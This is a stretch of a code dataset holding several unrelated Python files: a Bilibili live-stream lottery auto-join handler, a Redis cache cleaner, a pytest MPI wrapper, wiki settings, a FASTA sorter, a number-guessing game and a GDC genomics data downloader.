'小电视', 'user', f'参与了房间{real_roomid:^9}的小电视抽奖'], True)\n Printer().printlist_append(\n ['join_lottery', '小电视', 'user', \"# 小电视道具抽奖状态: \", json_response2['msg']])\n # -400不存在\n # -500繁忙\n if not json_response2['code']:\n Statistics.append_to_TVlist(raffleid, real_roomid)\n return True\n elif json_response2['code'] == -500:\n print('# -500繁忙,稍后重试')\n return False\n else:\n print(json_response2)\n return True\n \n \nasync def handle_1_captain_raffle(num, roomid, raffleid):\n await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n json_response2 = await bilibili.get_gift_of_captain(roomid, raffleid)\n if not json_response2['code']:\n print(\"# 获取到房间 %s 的总督奖励: \" %(roomid), json_response2['data']['message'])\n Statistics.append_to_captainlist()\n else:\n print(json_response2)\n return True\n \n \nasync def handle_1_activity_raffle(num, giftId, text1, text2, raffleid):\n # print('参与')\n await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n json_response1 = await bilibili.get_gift_of_events_app(text1, text2, raffleid)\n json_pc_response = await bilibili.get_gift_of_events_web(text1, text2, raffleid)\n \n Printer().printlist_append(['join_lottery', '', 'user', f'参与了房间{text1:^9}的{bilibili.get_giftids_raffle(str(giftId))}活动抽奖'], True)\n\n if not json_response1['code']:\n Printer().printlist_append(['join_lottery', '', 'user', \"# 移动端活动抽奖结果: \",\n json_response1['data']['gift_desc']])\n Statistics.add_to_result(*(json_response1['data']['gift_desc'].split('X')))\n else:\n print(json_response1)\n Printer().printlist_append(['join_lottery', '', 'user', \"# 移动端活动抽奖结果: \", json_response1['message']])\n \n Printer().printlist_append(\n ['join_lottery', '', 'user', \"# 网页端活动抽奖状态: \", json_pc_response['message']])\n if not json_pc_response['code']:\n Statistics.append_to_activitylist(raffleid, text1)\n else:\n print(json_pc_response)\n return True\n\n \nasync def handle_1_room_TV(real_roomid):\n await asyncio.sleep(random.uniform(0.5, 1.5))\n result = await utils.check_room_true(real_roomid)\n if True in result:\n Printer().printlist_append(['join_lottery', '钓鱼提醒', 'user', f'WARNING:检测到房间{real_roomid:^9}的钓鱼操作'], True)\n else:\n # print(True)\n await bilibili.post_watching_history(real_roomid)\n json_response = await bilibili.get_giftlist_of_TV(real_roomid)\n # print(json_response['data']['list'])\n checklen = json_response['data']['list']\n list_available_raffleid = []\n for j in checklen:\n # await asyncio.sleep(random.uniform(0.5, 1))\n # resttime = j['dtime']\n raffleid = j['raffleId']\n status = j['status']\n if status == 1:\n # print('未参加')\n list_available_raffleid.append(raffleid)\n elif status == 2:\n # print('过滤')\n pass\n else:\n print(checklen)\n tasklist = []\n num_available = len(list_available_raffleid)\n for raffleid in list_available_raffleid:\n task = asyncio.ensure_future(handle_1_TV_raffle(num_available, real_roomid, raffleid))\n tasklist.append(task)\n if tasklist:\n raffle_results = await asyncio.gather(*tasklist)\n if False in raffle_results:\n print('有繁忙提示,稍后重新尝试')\n Rafflehandler.Put2Queue(handle_1_room_TV, (real_roomid,))\n\nasync def handle_1_room_activity(giftId, text1, text2):\n await asyncio.sleep(random.uniform(0.5, 1.5))\n result = await utils.check_room_true(text1)\n if True in result:\n Printer().printlist_append(['join_lottery', '钓鱼提醒', 'user', f'WARNING:检测到房间{text1:^9}的钓鱼操作'], True)\n else:\n # print(True)\n await bilibili.post_watching_history(text1)\n json_response = await bilibili.get_giftlist_of_events(text1)\n checklen = json_response['data']\n list_available_raffleid = []\n for j in checklen:\n # await asyncio.sleep(random.uniform(0.5, 1))\n resttime = j['time']\n raffleid = j['raffleId']\n if Statistics.check_activitylist(text1, raffleid):\n list_available_raffleid.append(raffleid)\n tasklist = []\n num_available = len(list_available_raffleid)\n for raffleid in list_available_raffleid:\n task = asyncio.ensure_future(handle_1_activity_raffle(num_available, giftId, text1, text2, raffleid))\n tasklist.append(task)\n if tasklist:\n raffle_results = await asyncio.gather(*tasklist)\n if False in raffle_results:\n print('有繁忙提示,稍后重新尝试')\n Rafflehandler.Put2Queue(handle_1_room_activity, (giftId, text1, text2))\n \n\nasync def handle_1_room_captain(roomid):\n await asyncio.sleep(random.uniform(0.5, 1.5))\n result = await utils.check_room_true(roomid)\n if True in result:\n Printer().printlist_append(['join_lottery', '钓鱼提醒', 'user', f'WARNING:检测到房间{roomid:^9}的钓鱼操作'], True)\n else:\n # print(True)\n await bilibili.post_watching_history(roomid)\n num = 0\n while True:\n json_response1 = await bilibili.get_giftlist_of_captain(roomid)\n # print(json_response1)\n num = len(json_response1['data']['guard'])\n if not num:\n await asyncio.sleep(5)\n else:\n break\n \n list_available_raffleid = []\n # guard这里领取后,list对应会消失,其实就没有status了,这里是为了统一\n for j in json_response1['data']['guard']:\n id = j['id']\n status = j['status']\n if status == 1:\n # print('未参加')\n list_available_raffleid.append(id)\n elif status == 2:\n # print('过滤')\n pass\n else:\n print(json_response1)\n \n tasklist = []\n num_available = len(list_available_raffleid)\n for raffleid in list_available_raffleid:\n task = asyncio.ensure_future(handle_1_captain_raffle(num_available, roomid, raffleid))\n tasklist.append(task)\n if tasklist:\n raffle_results = await asyncio.gather(*tasklist)\n if False in raffle_results:\n print('有繁忙提示,稍后重新尝试')\n Rafflehandler.Put2Queue(handle_1_room_captain, (roomid,))\n \n \n\n","sub_path":"rafflehandler.py","file_name":"rafflehandler.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"293281540","text":"################################\n# 已废弃\n################################\n\nfrom common import redis_cli\n\nUSER_CACHE_LIMIT = 10000\nUSER_FOLLOWING_CACHE_LIMIT = 10000\nUSER_FANS_CACHE_LIMIT = 10000\nUSER_ARTICLE_CACHE_LIMIT = 10000\n\n\nARTICLE_COMMENT_CACHE_LIMIT = 10000 # 热门评论的文章缓存数量\nCOMMENT_REPLY_CACHE_LIMIT = 10000 # 热门回复的评论缓存数量\nCOMMENT_CONTENT_CACHE_LIMIT = 100 # 评论的缓存限制\n\nARTICLE_CACHE_LIMIT = 50000\n\n\ndef clear_user_cache():\n \"\"\"\n 清理用户数据缓存,仅保留有限的最近活跃用户\n \"\"\"\n r = redis_cli['user_cache']\n size = r.zcard('user')\n if size <= USER_CACHE_LIMIT:\n return\n\n end_index = size - USER_CACHE_LIMIT\n user_id_li = r.zrange('user', 0, end_index-1)\n user_cache_keys = []\n for user_id in user_id_li:\n user_cache_keys.append('user:{}'.format(user_id))\n pl = r.pipeline()\n pl.delete(*user_cache_keys)\n pl.zrem('user', *user_id_li)\n pl.execute()\n\n\ndef clear_user_following_cache():\n \"\"\"\n 清理用户关注数据\n \"\"\"\n r = redis_cli['user_cache']\n size = r.zcard('user:following')\n if size <= USER_FOLLOWING_CACHE_LIMIT:\n return\n\n end_index = size - USER_FOLLOWING_CACHE_LIMIT\n user_id_li = r.zrange('user:following', 0, end_index - 1)\n user_cache_keys = []\n for user_id in user_id_li:\n user_cache_keys.append('user:{}:following'.format(user_id))\n pl = r.pipeline()\n pl.delete(*user_cache_keys)\n pl.zrem('user:following', *user_id_li)\n pl.execute()\n\n\ndef clear_user_fans_cache():\n \"\"\"\n 清理用户粉丝数据\n \"\"\"\n r = redis_cli['user_cache']\n size = r.zcard('user:fans')\n if size <= USER_FANS_CACHE_LIMIT:\n return\n\n end_index = size - USER_FANS_CACHE_LIMIT\n user_id_li = r.zrange('user:fans', 0, end_index - 1)\n user_cache_keys = []\n for user_id in user_id_li:\n user_cache_keys.append('user:{}:fans'.format(user_id))\n pl = r.pipeline()\n pl.delete(*user_cache_keys)\n pl.zrem('user:fans', *user_id_li)\n pl.execute()\n\n\ndef clear_user_article_cache():\n \"\"\"\n 清理用户文章数据\n \"\"\"\n r = redis_cli['user_cache']\n size = r.zcard('user:art')\n if size <= USER_ARTICLE_CACHE_LIMIT:\n return\n\n end_index = size - USER_ARTICLE_CACHE_LIMIT\n user_id_li = r.zrange('user:art', 0, end_index - 1)\n user_cache_keys = []\n for user_id in user_id_li:\n user_cache_keys.append('user:{}:art'.format(user_id))\n pl = r.pipeline()\n pl.delete(*user_cache_keys)\n pl.zrem('user:art', *user_id_li)\n pl.execute()\n\n\ndef clear_comment_cache():\n \"\"\"\n 清理评论(包括评论回复)的缓存,仅保留有限的最热评论数据\n \"\"\"\n r = redis_cli['comm_cache']\n pl = r.pipeline()\n\n # 清理文章评论\n size = r.zcard('art:comm')\n\n # 清理非热门评论\n if size > ARTICLE_COMMENT_CACHE_LIMIT:\n end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n article_id_li = r.zrange('art:comm', 0, end_index-1)\n delete_keys = []\n if article_id_li:\n for article_id in article_id_li:\n\n comment_id_li = r.zrange('art:{}:comm'.format(article_id), 0, -1)\n if comment_id_li:\n for comment_id in comment_id_li:\n delete_keys.append('comm:{}'.format(comment_id))\n\n delete_keys.append('art:{}:comm'.format(article_id))\n delete_keys.append('art:{}:comm:figure'.format(article_id))\n\n if delete_keys:\n pl.delete(*delete_keys)\n pl.zrem('art:comm', *article_id_li)\n pl.execute()\n\n # 清理热门评论数量\n delete_keys = []\n article_id_li = r.zrange('art:comm', 0, -1)\n if article_id_li:\n for article_id in article_id_li:\n size = r.zcard('art:{}:comm'.format(article_id))\n if size > COMMENT_CONTENT_CACHE_LIMIT:\n end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n comment_id_li = r.zrange('art:{}:comm'.format(article_id), 0, end_index - 1)\n if comment_id_li:\n for comment_id in comment_id_li:\n delete_keys.append('comm:{}'.format(comment_id))\n if delete_keys:\n r.delete(*delete_keys)\n\n # 清理评论回复\n size = r.zcard('comm:reply')\n\n # 清理非热门评论回复\n if size > COMMENT_REPLY_CACHE_LIMIT:\n end_index = size - COMMENT_REPLY_CACHE_LIMIT\n comment_id_li = r.zrange('comm:reply', 0, end_index-1)\n delete_keys = []\n if comment_id_li:\n for comment_id in comment_id_li:\n\n reply_id_li = r.zrange('comm:{}:reply'.format(comment_id), 0, -1)\n if reply_id_li:\n for reply_id in reply_id_li:\n delete_keys.append('comm:{}'.format(reply_id))\n\n delete_keys.append('comm:{}:reply'.format(comment_id))\n delete_keys.append('comm:{}:reply:figure'.format(comment_id))\n\n if delete_keys:\n pl.delete(*delete_keys)\n\n pl.zrem('comm:reply', *comment_id_li)\n pl.execute()\n\n # 清理热门评论回复数量\n delete_keys = []\n comment_id_li = r.zrange('comm:reply', 0, -1)\n if comment_id_li:\n for comment_id in comment_id_li:\n size = r.zcard('comm:{}:reply'.format(comment_id))\n if size > COMMENT_CONTENT_CACHE_LIMIT:\n end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n reply_id_li = r.zrange('comm:{}:reply'.format(comment_id), 0, end_index - 1)\n if reply_id_li:\n for reply_id in reply_id_li:\n delete_keys.append('comm:{}'.format(reply_id))\n if delete_keys:\n r.delete(*delete_keys)\n\n\ndef clear_article_cache():\n \"\"\"\n 清理文章缓存\n \"\"\"\n r = redis_cli['art_cache']\n size = r.zcard('art')\n if size <= ARTICLE_CACHE_LIMIT:\n return\n\n end_index = size - ARTICLE_CACHE_LIMIT\n article_id_li = r.zrange('art', 0, end_index - 1)\n article_cache_keys = []\n for article_id in article_id_li:\n article_cache_keys.append('art:{}:info'.format(article_id.decode()))\n # TODO 清理文章detail缓存\n pl = r.pipeline()\n pl.delete(*article_cache_keys)\n pl.zrem('art', *article_id_li)\n pl.execute()\n\n\n\n","sub_path":"schedule/clear_cache.py","file_name":"clear_cache.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"571676379","text":"import subprocess\nimport sys\nfrom argparse import ArgumentParser\n\nfrom mpi4py import MPI\n\nfrom ._plugin import MPI_SESSION_ARGUMENT\nfrom ._test_name_converter import get_filename\n\nparser = ArgumentParser()\nparser.add_argument(\"test_name\")\n\nargs = parser.parse_args()\n\ntry:\n subprocess.check_output(\n [sys.executable, \"-m\", \"pytest\", \"--color=yes\", MPI_SESSION_ARGUMENT]\n + [args.test_name],\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n )\nexcept subprocess.CalledProcessError as error:\n with open(\n f\"{get_filename(args.test_name)}_{MPI.COMM_WORLD.Get_rank()}\", \"w\"\n ) as f:\n test_name = args.test_name.split(\":\")[-1]\n output = error.output.split(\"\\n\")\n for i in range(len(output)):\n if test_name in output[i]:\n break\n\n output = \"\\n\".join(output[i + 1 : -2])\n f.write(output)\n sys.exit(error.returncode)\n","sub_path":"pytest_MPI/_print_capture.py","file_name":"_print_capture.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"429717138","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\n\nclass Message:\n\n def __init__(self, db, **kwargs):\n self.collection = db['messages']\n\n async def save(self, user, msg, **kw):\n result = await self.collection.insert({'user': user, 'msg': msg, 'time': datetime.now()})\n return result\n\n async def get_messages(self):\n messages = self.collection.find().sort([('time', 1)])\n result = []\n for message in await messages.to_list(length=None):\n result.append({\n '_id': str(message['_id']),\n 'user': message['user'],\n 'msg': message['msg'],\n 'time': str(message['time']),\n })\n return result\n","sub_path":"gbserver/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"45023363","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\n# Default settings.. overwrite in your own settings.py\n\n# Planned feature.\nWIKI_USE_MARKUP_WIDGET = True\n\n####################\n# LOGIN PROTECTION #\n####################\n# Before setting the below parameters, please note that permissions can\n# be set in the django permission system on individual articles and their\n# child articles. In this way you can add a user group and give them\n# special permissions, be it on the root article or some other. Permissions\n# are inherited on lower levels.\n\n# Adds standard django login protection for viewing\nWIKI_REQUIRE_LOGIN_VIEW = getattr(settings, 'SIMPLE_WIKI_REQUIRE_LOGIN_VIEW',\n False)\n\n# Adds standard django login protection for editing\nWIKI_REQUIRE_LOGIN_EDIT = getattr(settings, 'SIMPLE_WIKI_REQUIRE_LOGIN_EDIT',\n True)\n\n####################\n# ATTACHMENTS #\n####################\n\n# This should be a directory that's writable for the web server.\n# It's relative to the MEDIA_ROOT.\nWIKI_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS',\n 'simplewiki/attachments/')\n\n# If false, attachments will completely disappear\nWIKI_ALLOW_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ALLOW_ATTACHMENTS',\n True)\n\n# If WIKI_REQUIRE_LOGIN_EDIT is False, then attachments can still be disallowed\nWIKI_ALLOW_ANON_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ALLOW_ANON_ATTACHMENTS', False)\n\n# Attachments are automatically stored with a dummy extension and delivered\n# back to the user with their original extension.\n# This setting does not add server security, but might add user security\n# if set -- or force users to use standard formats, which might also\n# be a good idea.\n# Example: ('pdf', 'doc', 'gif', 'jpeg', 'jpg', 'png')\nWIKI_ATTACHMENTS_ALLOWED_EXTENSIONS = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS_ALLOWED_EXTENSIONS',\n None)\n\n# At the moment this variable should not be modified, because\n# it breaks compatibility with the normal Django FileField and uploading\n# from the admin interface.\nWIKI_ATTACHMENTS_ROOT = settings.MEDIA_ROOT\n\n# Bytes! Default: 1 MB.\nWIKI_ATTACHMENTS_MAX = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS_MAX',\n 1 * 1024 * 1024)\n \n####################\n# AESTHETICS #\n####################\n\n# Planned features\nWIKI_PAGE_WIDTH = getattr(settings, 'SIMPLE_WIKI_PAGE_WIDTH', \"100%\")\nWIKI_PAGE_ALIGN = getattr(settings, 'SIMPLE_WIKI_PAGE_ALIGN', \"center\")\n","sub_path":"infolab/simplewiki/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"532684866","text":"import argparse\nimport logging\nimport re\nfrom Bio import SeqIO\n\ndef get_args():\n \"\"\"\n Get arguments from command line with argparse.\n \"\"\"\n parser = argparse.ArgumentParser(\n prog='Sort-Fasta-Records-Biopython.py',\n description=\"\"\"Sort all entries in a fasta file by order of record name.\"\"\")\n\n parser.add_argument(\"-f\", \"--fasta\",\n required=True,\n help=\"The FASTA file to sort.\")\n \n parser.add_argument(\"-o\", \"--outfile\",\n required=True,\n help=\"The name of the output FASTA file (example: output.fasta).\")\n \n parser.add_argument(\"-l\", \"--logfile\",\n required=True,\n help=\"The name of the log file to write.\")\n\n return parser.parse_args()\n\ndef setup_logging(logfile):\n # set up logging to file\n logging.basicConfig(filename=logfile,\n format=\"%(levelname)s: %(asctime)s: %(message)s\",\n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.DEBUG)\n\ndef index_fasta(f):\n \"\"\"\n Use SeqIO to index the fasta file (f), which may be too big\n to parse into a list. Returns a dictionary-like structure,\n with seq names as keys and seqs as values.\n\n :param f: path to fasta file\n :return: dictionary-like structure of fasta records\n \"\"\"\n logging.info(\"index_fasta: Beginning to index fasta file.\")\n records = SeqIO.index(f, \"fasta\")\n logging.info(\"index_fasta: Found {:,} records.\".format(len(records)))\n logging.info(\"index_fasta: Completed indexing.\")\n\n return records\n\ndef sort_records(records):\n \"\"\"\n Returns a sorted list of the sequence names in fasta.\n\n :param records: records obtained from index_fasta\n :return: list of sorted sequence names\n \"\"\"\n logging.info(\"sort_records: Beginning sequence name sorting.\")\n convert = lambda text: int(text) if text.isdigit() else text\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n ordered_names = sorted(list(records), key = alphanum_key)\n logging.info(\"sort_records: Completed sorting.\")\n #for n in ordered_names:\n # print(\"{:,}\".format(int(n.split('/')[1])))\n return ordered_names\n\ndef write_records(records, ordered_names, outfile):\n \"\"\"\n Write output fasta.\n :param records: dictionary-like structure from index_fasta\n :param ordered_names: list of sequence names, in sorted order\n :param outfile: name of output file to write\n :return: None\n \"\"\"\n logging.info(\"write_records: Beginning to write fasta file.\")\n rec_list = []\n rec_count = int(1)\n with open(outfile, 'a') as fhout:\n for n in ordered_names:\n rec_list.append(records[n].format(\"fasta\"))\n if len(rec_list) > 50000:\n fhout.write(\"\".join(rec_list))\n rec_list = []\n rec_count += 1\n fhout.write(\"\".join(rec_list))\n \n logging.info(\"write_records: Completed writing.\")\n\n\ndef main():\n args = get_args()\n setup_logging(args.logfile)\n records = index_fasta(args.fasta)\n ordered_names = sort_records(records)\n write_records(records, ordered_names, args.outfile)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Taxonomic-Profiling-Nucleotide/scripts/Sort-Fasta-Records-BioPython.py","file_name":"Sort-Fasta-Records-BioPython.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"514330690","text":"import os\nimport tornado.web\nfrom views import Start,Shops,Login,Register,Filter\nfrom webAPI import LoginWeb,move,RegisterWeb,FilterWeb\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nSETTINGS = {\n \"template_path\": os.path.join(BASE_DIR, \"templates\"),\n \"static_path\": os.path.join(BASE_DIR, \"static\")\n}\n\nHANDLERS = [\n (r\"/\", Start),\n (r\"/login\", Login),\n (r\"/ajax/login\", LoginWeb),\n\t(r\"/shop\", Start),\n\t(r\"/ajax/shop\", move),\n\t(r\"/register\",Register),\n\t(r\"/ajax/register\",RegisterWeb),\n (r\"/filter\",Filter),\n (r\"/ajax/filter\",FilterWeb),\n]\n\nUI_MODULES={\n\t'Shop': Shops\n}\n\napplication = tornado.web.Application(\n handlers = HANDLERS,\n ui_modules=UI_MODULES,\n**SETTINGS)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"311938000","text":"import random\nimport time\nimport sys\n\ndef random_guessing():\n number=random.randint(1,10)\n print('random number ',number)\n while True:\n try:\n my_input=int(input('Input '))\n if my_input>=1 and my_input<=10:\n if my_input==number:\n print('Hurrrayyy..... You are a Genius ...')\n break\n else:\n print('Try Again')\n continue\n else:\n print('Hey bro, I said Enter 1~10')\n continue\n except ValueError:\n print('Please enter a number')\n continue\n\n\nrandom_guessing()\n\n\nwhile True:\n try:\n x=input('You want to play again [Y/N]').lower()\n if x=='y':\n random_guessing()\n continue\n elif x=='n':\n print('Exit')\n sys.exit()\n except ValueError:\n print('Try to enter Y/N')\n continue\n \ntime.sleep(5)\n \n\n\n","sub_path":"Guessing_Game.py","file_name":"Guessing_Game.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399561678","text":"import re\nimport gzip\nimport shutil\nimport requests\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\nimport collections\nimport h5py\nfrom scipy import sparse\nimport csv\n\n#main gdc api querry function\ndef get_projects_info(project_names):\n '''\n a method for retrieveing data about cases and their related samples for specified gdc projects.\n The method looks for which of the projects specified actually exist in the GDC and then for each\n of the project retrieves all the cases with data about them like demographic and data about\n samples related to each case.\n \n Input:\n List of project names for which data should be retrieved\n \n Output:\n dict:\n data dict: data in the form of a dictionary with the structure: {project_name: {case_id: {data about the case}}}\n image to sample: mapping from image file name to sample id for matching with labels\n case to images: mapping from case id to list of associated images for dataset creation\n labels: label dataframe\n mutational signatures: mutatiuonal signatures dataframe\n hugo symbols: hugo symbols dataframe\n '''\n \n #check if project_names is a list of strings\n if not(isinstance(project_names,list) and all(isinstance(i,str) for i in project_names)):\n raise TypeError(\"project_names expects a list of strings\")\n \n #define api endpoints\n cases_endpt = 'https://api.gdc.cancer.gov/cases'\n projects_endpt = 'https://api.gdc.cancer.gov/projects'\n \n \n #check which of the specified project names are in gdc\n print(\"looking for project names in GDC database.\")\n \n filters = {\n \"op\":\"in\",\n \"content\":{\n \"field\":\"project_id\",\n \"value\":project_names\n }\n }\n params = {\n \"filters\": json.dumps(filters),\n \"fields\":\"project_id\",\n \"format\":\"json\",\n \"pretty\":\"true\",\n }\n \n response = requests.get(projects_endpt, params = params)\n response = json.loads(response.content.decode(\"utf-8\"))\n print(80*'-')\n \n if not(response['warnings']=={}):\n print(\"warnings:\")\n print(response['warnings'])\n \n found_projects = list(map(lambda x: x['project_id'],response['data']['hits']))\n print(\"Projects found in GDC:\",found_projects)\n out_samples = []\n projects_data={}\n image_to_sample={}\n case_to_images={}\n out_hugos = []\n all_barcodes = []\n \n #mutational signature file for the entire tcga dataset\n signatures = pd.read_csv(os.path.join(\"manifest\", 'TCGA_WES_sigProfiler_SBS_signatures_in_samples.csv'))\n signatures['case_id'] = signatures['Sample Names'].apply(lambda x : '-'.join(x.split('-')[:3]))\n signatures = signatures.iloc[:,3:]\n #search for cases for each project\n print(80*'-')\n for project in found_projects:\n \n print(\"looking for cases for project:\",project)\n \n filters = {\n \"op\":\"=\",\n \"content\":{\n \"field\":\"project.project_id\",\n \"value\":project\n }\n }\n \n fields = ['case_id','project.project_id',\"submitter_id\",\"files.file_id\",\"files.file_name\"]\n fields = ','.join(fields)\n \n params = {\n \"filters\":json.dumps(filters),\n \"fields\" :fields,\n \"format\" :\"json\",\n \"pretty\" :\"true\",\n \"size\" : \"1100\",\n \"expand\" : \"demographic,samples,files,diagnoses\"\n }\n\n response = requests.get(cases_endpt, params = params)\n cases = json.loads(response.content.decode(\"utf-8\"))\n print(\"retrieved\",cases['data']['pagination']['count'],\"cases in the\",project,\"project\")\n \n \n #add cases to dictionary\n found_cases = cases['data']['hits']\n out_cases = {}\n for case in found_cases:\n \n #section for creating a dataframe\n for sample in case['samples']:\n sample_dict = {}\n sample_dict['case_barcode'] = case['submitter_id']\n sample_dict['project'] = case['project']['project_id']\n sample_dict['case_id'] = case['case_id']\n\n #add demographic data for sample\n demographic_dict = case.get('demographic',{})\n for key in demographic_dict:\n sample_dict[\"demographic.\"+key] = demographic_dict[key]\n\n #add diagnose data for sample\n diagnoses_dict = case.get('diagnoses',{})\n #the diagnostic value is a list with either length 0 or 1 if empty list then change it to empty\n #dict for convenience\n if len(diagnoses_dict)>0:\n diagnoses_dict = diagnoses_dict[0]\n else:\n diagnoses_dict = {}\n for key in diagnoses_dict:\n sample_dict[\"diagnose.\"+key] = diagnoses_dict[key]\n sample_dict['sample.barcode']=sample['submitter_id']\n #print(sample['submitter_id'])\n for key in sample:\n if key != 'submitter_id':\n sample_dict['sample.'+key]=sample[key]\n #print(sample_dict['sample.barcode'])\n out_samples.append(sample_dict)\n \n \n #dict section\n demographic = case.get('demographic',{})\n samples = case.get('samples',[])\n mutational_signatures = signatures[signatures['case_id']==case['submitter_id']]\n \n if mutational_signatures.shape[0] != 0:\n mutational_signatures = mutational_signatures.iloc[0,:-1].to_list()\n else:\n mutational_signatures = []\n\n out_cases[case['submitter_id']]={\"demographic\":demographic,\"samples\":samples,\n \"case_id\":case['case_id'],\"hugo_symbols\":[],\n \"mutational_signature\":mutational_signatures,\n }\n \n #add slide image file names to cases for mapping from cases to images\n for sample in out_cases[case['submitter_id']]['samples']:\n #sample_mut_sig = \n sample['image_files']=[]\n \n images_for_case = []\n for file in case['files']:\n if file['data_format']=='SVS':\n sample_id = '-'.join(file['submitter_id'].split('-')[:4])\n images_for_case.append(file['file_name'])\n image_to_sample[file['file_name']] = sample_id\n for sample in out_cases[case['submitter_id']]['samples']:\n if sample['submitter_id']==sample_id:\n sample['image_files'].append(file['file_name'])\n #add list of image file names to mapping for that case \n if images_for_case != []:\n case_to_images[case['submitter_id']]=images_for_case\n \n #delete samples with no image files\n for i,sample in enumerate(out_cases[case['submitter_id']]['samples']):\n if sample['image_files']==[]:\n del out_cases[case['submitter_id']]['samples'][i]\n \n #delete cases with no samples\n if out_cases[case['submitter_id']]['samples'] == []:\n del out_cases[case['submitter_id']]\n \n #download maf file to add hugo symbols to each case\n print(\"downloading maf file for project\",project)\n zip_file,maf_file = download_maf_for_proj(project)\n \n #if maf file for the given project was found and extracted then add it to \n if maf_file != None:\n print(\"downloaded file:\",zip_file)\n print(\"file extracted to:\",maf_file)\n\n with open(maf_file) as maf:\n rd = csv.reader(maf,delimiter='\\t', quotechar='\"')\n #skip headers\n for i in range(6):\n next(rd)\n #add hugo symbols to each case\n for line in rd:\n symbol = line[0]\n case_id = '-'.join(line[15].split('-')[:3])\n out_cases[case_id]['hugo_symbols'].append(symbol)\n\n #add cases to hugo symbol dataframe\n all_barcodes = all_barcodes+list(out_cases.keys())\n for case in out_cases:\n symbols = out_cases[case]['hugo_symbols']\n symbols = dict(collections.Counter(symbols))\n out_hugos.append(symbols)\n \n #add the cases doctionary for given project to the projects dictionary\n projects_data[project]=out_cases\n print(80*'-')\n \n #create sparse dataframe for hugos\n hugos = dicts_to_sparse(out_hugos)\n hugos['case_barcode'] = all_barcodes\n\n samples = pd.DataFrame.from_records(out_samples)\n samples = samples.fillna(np.nan)\n print(\"done\") \n return {\"data dict\":projects_data,\"image to sample\":image_to_sample,\n \"case to images\":case_to_images,\"labels\":samples, \"mutational signatures\" : signatures,\n \"hugo symbols\" : hugos}\n\n#file download functionality\ndef download_extract(file_id,project_name):\n download_endpt = \"https://api.gdc.cancer.gov/data/{}\".format(file_id)\n response = requests.get(download_endpt, headers = {\"Content-Type\": \"application/json\"})\n response_head_cd = response.headers[\"Content-Disposition\"]\n file_name = os.path.join(\"manifest\", re.findall(\"filename=(.+)\", response_head_cd)[0])\n out_name = os.path.join(\"manifest\", project_name+'-maf.tsv')\n \n with open(file_name, \"wb\") as output_file:\n output_file.write(response.content)\n \n with gzip.open(file_name, 'rb') as f_in:\n with open(out_name, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n return file_name,out_name\n\ndef download_maf_for_proj(project_name):\n files_endpt = \"https://api.gdc.cancer.gov/files\"\n\n workflow = {\"op\":\"=\",\n \"content\":{\n \"field\":\"analysis.workflow_type\",\n \"value\":\"MuSE Variant Aggregation and Masking\"\n }\n }\n\n category = {\"op\":\"=\",\n \"content\":{\n \"field\":\"data_category\",\n \"value\":\"Simple Nucleotide Variation\"\n }\n }\n\n dat_type = {\"op\":\"=\",\n \"content\":{\n \"field\":\"data_type\",\n \"value\":\"Masked Somatic Mutation\"\n }\n }\n proj = {\"op\":\"=\",\n \"content\":{\n \"field\":\"cases.project.project_id\",\n \"value\":project_name\n }\n }\n filters = {\n \"op\":\"and\",\n \"content\":[workflow,dat_type,category,proj]\n }\n params = {\n \"filters\":json.dumps(filters),\n \"fields\" : \"data_type,data_category,file_id,cases.project.project_id\",\n \"format\" :\"json\",\n \"pretty\" :\"true\",\n \"size\" : \"5\",\n \"expand\" : \"analysis\",\n }\n\n response = requests.get(files_endpt, params = params)\n file_data = json.loads(response.content.decode(\"utf-8\"))\n \n #if no maf file found do nothing\n if(file_data['data']['pagination']['total']==0):\n print(\"no maf file found for project\",project_name)\n return None,None\n \n file_id = file_data['data']['hits'][0]['file_id']\n return download_extract(file_id,project_name)\n\ndef download_image(file_name,path=\"\"):\n file_path = os.path.join(path,file_name)\n #check if image already exists\n if not os.path.exists(file_path):\n if not os.path.exists(path):\n os.makedirs(path)\n files_endpt = \"https://api.gdc.cancer.gov/files\"\n\n context = {\"op\":\"=\",\n \"content\":{\n \"field\":\"file_name\",\n \"value\":file_name\n }\n }\n params = {\n \"filters\":json.dumps(context),\n \"fields\" : \"file_id\",\n \"format\" :\"json\",\n \"pretty\" :\"true\",\n \"size\" : \"5\",\n }\n\n response = requests.get(files_endpt, params = params)\n 